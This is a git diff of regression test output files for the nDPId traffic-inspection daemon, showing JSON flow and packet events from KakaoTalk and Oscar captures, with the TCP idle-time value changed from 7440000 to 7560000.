-00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":3203,"packets-processed":3203,"total-skipped-flows":0,"total-l4-data-len":291404,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":9,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1430069216559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3203/3203 diff --git a/test/results/Oscar.pcap.out b/test/results/Oscar.pcap.out index e04bd97d6..a21049864 100644 --- a/test/results/Oscar.pcap.out +++ b/test/results/Oscar.pcap.out @@ -1,12 +1,12 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"Oscar.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434606464176} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"} 